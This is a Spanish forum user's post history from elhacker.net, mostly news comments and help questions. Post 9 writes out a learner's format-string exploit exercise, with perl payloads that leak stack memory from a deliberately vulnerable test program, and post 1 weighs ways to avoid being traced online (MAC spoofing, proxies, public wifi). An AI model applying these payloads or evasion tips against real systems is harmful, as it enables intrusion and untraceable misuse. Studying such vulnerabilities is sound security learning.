elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


  Mostrar Mensajes
Páginas: [1] 2
1  Seguridad Informática / Seguridad / Anonimato con el ordenador en: 15 Mayo 2012, 19:34 pm
Buenas, estoy investigando el tema del anonimato, y he dado con la dirección MAC. Por un lado, dicen que mejor modificarla con programas, por otro no.
Por lo que he llegado a concluir es que, los ISP usan diferentes protocolos (también no todas las redes usan Ethernet, hablando del caso de redes LAN, por ejemplo). En el caso de telefónica tenemos PPPoE, protocolo Ethernet, que sí puede almacenar la MAC; el resto, normalmente, de ISP usan PPPoA, basado en ATM, y no usa MAC en su funcionamiento.
Pero ahora yo he llegado a la siguiente conclusión: al conectarme a un proxy, mi ISP no interviene, por lo que él no tiene nada que almacenar mi MAC, y el proxy no debe de almacenar la MAC, al igual que la IP. Ya ni digamos si usamos redes TOR o similares (es decir, métodos de seguridad de este estilo)
Bien, eso es hacia el exterior, hablando desde el router o modem. Pero, en el interior, que pasa si, intentando buscar el anonimato, me busco una wifi inalambrica pública, en estos casos sí debo de tener cuidado con mi MAC, o usar una antena yagi, aunque en este caso también por si acaso, ocultaría mi MAC. También he leido en el foro, que por ejemplo el McDonalds, nadie controla la red, pero eso no quiere decir que exista un registro de día/hora/MAC al que se accedió allí (y ya podemos ponernos paranoicos y buscar camaras de seguridad, etc  :¬¬ ).

Tengamos en cuenta que los proxys, 100% seguros no son, dependiendo de la política de ley del país, y de si este almacena logs o no (que a ciencia cierta tampoco se sabe), pueden rastrear y llegar al McDonals, en el peor de los casos, así que la seguridad de más es poca.

¿Qué opinais?
2  Foros Generales / Noticias / Re: En 5 años no habrá discos en las cajas de los videojuegos, encontraremos códigos en: 19 Marzo 2012, 16:42 pm
El rumor de la Xbox 720 si está circulando por la red, pero parece ser que la intención es que desaparezca el dispositivo de almacenamiento del disco, para dar paso a dispositivos de almacenamiento de tarjetas de memoria.
La desaparición del juego físico como tal, aunque posible, sería dura y difícil de aceptar por parte de personas, como yo, que nos gusta ver en nuestra estantería el repertorio de los juegos con su caratula.

También comentar que hace tiempo, salió una consola portátil de estas características, sin dispositivo físico de juegos, y fue un fiasco completo.

Veremos a qué nos lleva la evolución ...
3  Seguridad Informática / Seguridad / Re: [AIO elhacker.NET] Compilación herramientas análisis y desinfección malware en: 22 Febrero 2012, 22:13 pm
Gracias por el aporte  ;D
4  Foros Generales / Noticias / Re: El furor de los 'gatos empanados', verdadero fenómeno en la Red en: 15 Febrero 2012, 12:19 pm
 :o cuanto tiempo libre jajajajaja  :¬¬ :xD
5  Foros Generales / Noticias / Re: El cierre de páginas en España comenzará el 1 de marzo en: 15 Febrero 2012, 10:56 am
No lo entiendo, ¿qué tiene de lega cinetube de otras?. La he ido a visitar y es una página de enlaces como otra cualquier ....
6  Programación / Programación C/C++ / Re: Modificacion del registro de windows en: 24 Enero 2012, 17:42 pm
Gracias de todos modos, pero eso ya lo he leído yo. Preguntaba si alguien lo había hecho, y había conseguido un resultado.
7  Programación / Programación C/C++ / Modificacion del registro de windows en: 22 Enero 2012, 19:49 pm
Hola,
estoy con este tema, y he conseguido ya acceder al registro y leer datos del registro con C++. pero tengo un problema. Cuando quiero acceder a un value de un Key, en el que el nombre es (Predeterminado), es decir no tiene un valor, no consigo acceder a él.

Código:
RegQueryValueEx(lugar,value,0,tipo,(LPBYTE)datos,&tamanho)

value es el valor a leer del registro; he probado con poner "", "(Predeterminado)" y no consigo acceder a él, siempre me da como resultado que no accede a ningún value.
¿alguien a accedido alguna vez a un value de esta índole?
Gracias!
8  Sistemas Operativos / Windows / Re: Error en disco duro en: 22 Diciembre 2011, 01:32 am
Lo suyo es un testeo del hardware con hirens boot. Eso es descargartelo de su página (en google, fácilmente aparece), y quemar la imagen en un Cd.

Arrancar el Pc con el cd en la unidad de cd y arranca el cd. Ve a la opción Hard Disk Tools, y prueba un testeo de la marca de tu HDD.

Si no encuentras nada de errores, prueba ya una herramienta de testeo más general.

Opino que si en Linux no ocurre nada, y a Windows hace cosas raras, puede ser problema de los sectores del HDD donde se aloja Windows.

9  Seguridad Informática / Hacking / Vulnerabilidad de cadena de formato en: 20 Diciembre 2011, 23:16 pm
Muy buenas,

veréis estoy intentando aprobecharme de la vulnerabilidad de la cadena de formato, principalmente intentando leer una direccion de memoria arbitraria gracias a printf y a %s. El funcionamiento es el siguiente,

tengo un fmt_vuln.c que es algo asi
Código:
...

int main(int argc, char *argv[])
...

strcpy(text,argv[1]);
printf(text);
...
}

toma el argumento 1, que es un string, lo copia en text y lo imprime

ahora vayamos con las pruebas

Citar
usuario@usuario:~/Hacking$ ./fmt_vuln AAAA.$(perl -e 'print "%08x."x8') 
AAAA.bf87a1b0.b7f60585.b7df9c20.bf87a654.00000001.b7f7cff4.7c96f087.41414141.

lo que hago aquí es enviar una cadena AAAA y, usando la bash y perl, quiero ver que hay en la pila, bajo el marco de la función, haciendo uso de la vulnerabilidad de printf al intentar leer el formato de cadena

el resultado el que sigue: veo la cadena AAAA, al principio, luego varias cosas en memoria y al final 41414141, que es donde está almacenada mi cadena AAAA (\x41 en codigo ASCII es A). Ahora bien, si yo en vez de usar %x, usara %s, en el formato de cadena, debería leerme el contenido de la dirección de memoria que se pasara como parametro, pero como no hay parametro, si pongo,

Citar
usuario@usuario:~/Hacking$ ./fmt_vuln AAAA.$(perl -e 'print "%08x."x7').%s 

intentaría acceder a la dirección 41414141. Lógico esto no existe. Entonces intento insertar una dirección que sí exista. Voy a crear una variable PATH y localizar su direccion en memoria

Citar
env | grep PATH

a traves de un código, averiguo que PATH está en

Citar
PATH will be at 0xbf9e4d49

pues si yo introduzco esa dirección, invirtiendola debido a la arquitectura de la memoria, de la misma forma que hice antes, debería de aparecer en memoria

Citar
usuario@usuario:~/Hacking$ ./fmt_vuln $(perl -e 'print "\x49\x9d\9e\xbf"').$(perl -e 'print "%08x."x12')

pero no, el resultado que me da es

Citar
I�9e�.bfc1bd40.b7eff585.b7d98c20.bfc1c1e4.00000001.b7f1bff4.7c96f087.65399d49.30252ebf.252e7838.2e783830.78383025.

y fijaros en varias cosas, al principio tengo mi dirección, luego información de memoria y al final aparecen unos valores repetidos \x30\x25\x2e\x78\x38 que si comprobáis como codigo ASCII esto son los valores correspondientes a %08x.

y aquí viene mi pregunta, ¿donde está mi direccion "\x49\x9d\9e\xbf"? porque debería de estar antes de esos valores.

Espero entiendan la explicación y el problema, gracias!
10  Foros Generales / Noticias / Re: Piden sanciones millonarias para páginas P2P en España en: 15 Diciembre 2011, 00:11 am
Lo mejor de todo son los cálculos, atentos:

9,99€ por cada cd de música, y los juegos de ps3 y psp son 25 € y 20 € respectivamente ....

¿hay que explicar más?

P.D.: yo voy al cine; yo hago uso del único videoclub-cajero que queda en mi ciudad; y en que mal momento desapareció el VHS
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines